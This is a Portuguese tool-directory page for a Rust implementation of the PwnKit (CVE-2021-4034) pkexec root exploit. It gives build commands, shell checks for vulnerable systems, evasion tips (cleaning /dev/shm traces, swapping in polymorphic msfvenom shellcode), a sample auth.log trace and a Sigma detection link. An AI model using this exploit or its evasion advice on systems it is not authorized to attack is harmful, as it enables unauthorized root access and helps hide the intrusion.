Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-4034-Rust — Implementação em Rust do exploit de escalonamento local de privilégios CVE-2021-4034 polkit pkexec, com instruções de compilação e considerações de detecção. | Kitploit
Ferramentas/GitHubGitHub/deoxykev/cve-2021-4034-rust
Escalada de PrivilégiosFrameworks de ExploraçãoExploraçãoRed TeamingDesenvolvimento de PayloadsExploração de Binários
GitHubdeoxykev/cve-2021-4034-rust

CVE-2021-4034-Rust

Implementação em Rust do exploit de escalonamento local de privilégios CVE-2021-4034 polkit pkexec, com instruções de compilação e considerações de detecção.

Ver Repositório
2há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-4034-Rust

LPE no Linux usando polkit-1 escrito em Rust.

Instruções de compilação

Instale o Rust se ainda não o fez

root@kitploit:~
git clone https://github.com/deoxykev/CVE-2021-4034-Rust
cd CVE-2021-4034-Rust
rustup target add x86_64-unknown-linux-musl
cargo build --release

Verificação de vulnerabilidade

root@kitploit:~
# verificar pkexec
which pkexec || echo not vuln

# verificar permissões suid no pkexec
stat -c '%a' $(which pkexec) | grep -q 4755 || echo not vuln

# verificar data do patch no pkexec
stat -c '%y' $(which pkexec)
# datas anteriores a 2022-01-12 podem estar sem patch e vulneráveis

Considerações de Opsec

  • Grava arquivos de exploit em /dev/shm (ramdisk)
    • apague o diretório gerado aleatoriamente depois
    • pode ser detectado na criação de arquivos
    • o shellcode é fixo, considere substituí-lo por um payload polimórfico (ex: saída do msfvenom)
  • a chamada de sistema ao pkexec com argumentos nulos pode ser detectada
  • os logs do pkexec são visíveis em /var/log/auth.log
root@kitploit:~
pkexec[121401]: user: The value for the SHELL variable was not found the /etc/shells file [USER=root] [TTY=/dev/pts/8] [CWD=/dev/shm/YWdQYnE3TSNlwNKMXEwYcGRVmdYipb] [COMMAND=GCONV_PATH=./tSq82ptZaDiyXWZz0BOybdH9fINqCG PATH=GCONV_PATH=. CHARSET=mgELtKAB9sXo0a9KJk00NNO0wa4x0J SHELL=mgELtKAB9sXo0a9KJk00NNO0wa4x0J]

Detecção por regra Sigma

  • https://github.com/SigmaHQ/sigma/blob/master/rules/linux/auditd/lnx_auditd_cve_2021_4034.yml

Créditos

divulgação da vulnerabilidade - equipe de pesquisa da qualsys - https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034 shellcode - @johkrupp - https://saarsec.rocks/2020/05/14/golf.so.html

Baixar ferramenta